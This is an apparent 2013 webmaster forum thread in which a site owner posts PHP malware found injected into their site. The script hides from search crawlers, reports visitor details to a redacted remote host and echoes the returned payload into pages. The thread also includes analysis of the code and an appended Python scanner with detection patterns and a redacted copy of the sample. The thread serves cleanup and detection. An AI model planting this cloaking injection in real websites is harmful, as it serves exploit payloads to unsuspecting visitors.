
Strange Virus Notice for Website

AVG and eset nod32 shows virus notice

9:36 am on May 1, 2013 (gmt 0)



Hello,

Since yesterday, both AVG and ESET NOD32 do not allow access to one of our websites.

I did not find any malicious code when I checked the source code.

I am desperately looking to resolve the issue.

Check [snip]


ESET NOD says the site is infected with Kryptik.ajz

AVG says blackhole exploit Trojan

[edited by: phranque at 10:36 am (utc) on May 1, 2013]
[edit reason] no personal urls please [/edit]

10:37 am on May 1, 2013 (gmt 0)

phranque (WebmasterWorld Administrator)



Welcome to WebmasterWorld, klpm!


I would look for any obfuscated JavaScript and especially anything that looks like a document.write or similar.

11:59 am on May 1, 2013 (gmt 0)



Thanks phranque, but I finally figured out and solved the issue (thanks to the "temporary disable" option in AVG).

I would like to share the code, thinking it may help other website owners.

The code was acting very smart.

The malicious code is not generated if the page is accessed by a search bot such as Google, MSN or Yahoo (so that the website owner does not come to know about the virus infection).

Check the code below.

<?php
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)
        &&(strstr($sUserAgent, 'yahoo') == false)
        &&(strstr($sUserAgent, 'baidu') == false)
        &&(strstr($sUserAgent, 'msn') == false)
        &&(strstr($sUserAgent, 'opera') == false)
        &&(strstr($sUserAgent, 'chrome') == false)
        &&(strstr($sUserAgent, 'bing') == false)
        &&(strstr($sUserAgent, 'safari') == false)
        &&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
            $stCurlLink = base64_decode( '[some encoded malware here]').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
        }
    }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0]=="O")
        {
            $sResult[0]=" ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>

[edited by: phranque at 12:45 pm (utc) on May 1, 2013]
[edit reason] sanitized [/edit]

11:29 pm on May 1, 2013 (gmt 0)




It is interesting that it treats the browsers Opera, Chrome and Safari as being bots and doesn't serve them the malware.
So it must be targeting IE and Firefox.

Also it looks like the writer of this code may not be a native English speaker as there are multiple spelling and grammar mistakes in the comments.

A search for the phrase "Looks for google serch bot" comes up with a fair number of results dating back to at least 2010.

What you need to determine is how your site was compromised in the first place, allowing them to add the PHP script. It looks like a fair number of the sites that were infected were WordPress ones, possibly using this vulnerability.
[markmaunder.com...]
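As an added example (not code from this thread), a small Python scanner that flags PHP files carrying the combination of indicators seen in the posted script, and that extracts the user-agent tokens a script cloaks from, which is how the observation above that Opera, Chrome and Safari are skipped can be made mechanically. The indicator patterns, weights, threshold and the redacted fixture are this example's own constructions.

```python
import os
import re

# (pattern, label, weight). Weights are an assumption: a lone curl call or
# User-Agent check is normal; the combination is what marks this injection.
INDICATORS = [
    (re.compile(r"Looks for google serch bot|This code use for global bot statistic"),
     "comment string from the posted sample", 5),
    (re.compile(r"strtolower\(\s*\$_SERVER\['HTTP_USER_AGENT'\]"), "lower-cased User-Agent", 1),
    (re.compile(r"strstr\(\s*\$\w+\s*,\s*'[^']+'\s*\)\s*==\s*false"), "crawler/browser cloaking test", 3),
    (re.compile(r"base64_decode\("), "base64-decoded literal (hidden URL)", 2),
    (re.compile(r"curl_init\("), "outbound curl request", 1),
    (re.compile(r"echo\s+\$sResult"), "remote response echoed into the page", 3),
]
THRESHOLD = 6  # assumption: a plain User-Agent check alone stays below this

def scan_source(src):
    """Return (score, labels) for one PHP source string."""
    hits = [(label, w) for pat, label, w in INDICATORS if pat.search(src)]
    return sum(w for _, w in hits), [label for label, _ in hits]

def cloaked_agents(src):
    """Sorted tokens the script hides from, i.e. its strstr(...) == false list."""
    return sorted(set(re.findall(r"strstr\(\s*\$\w+\s*,\s*'([^']+)'\s*\)\s*==\s*false", src)))

def scan_tree(root, threshold=THRESHOLD):
    """Walk a web root; return {path: (score, labels)} for files at or over threshold."""
    flagged = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith((".php", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, labels = scan_source(fh.read())
            if score >= threshold:
                flagged[path] = (score, labels)
    return flagged

# Constructed fixture: a condensed, redacted copy of the injection posted in the thread.
SAMPLE_INFECTED = r"""<?php
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'bot') == false)) {
$stCurlLink = base64_decode('[redacted]').'?ip='.urlencode($_SERVER['REMOTE_ADDR']);
@$stCurlHandle = curl_init( $stCurlLink ); $sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O") { $sResult[0]=" "; echo $sResult; } }
?>"""
```

Point `scan_tree()` at the web root; anything flagged should be compared against a known-good copy of the file, since the script is appended to otherwise legitimate PHP.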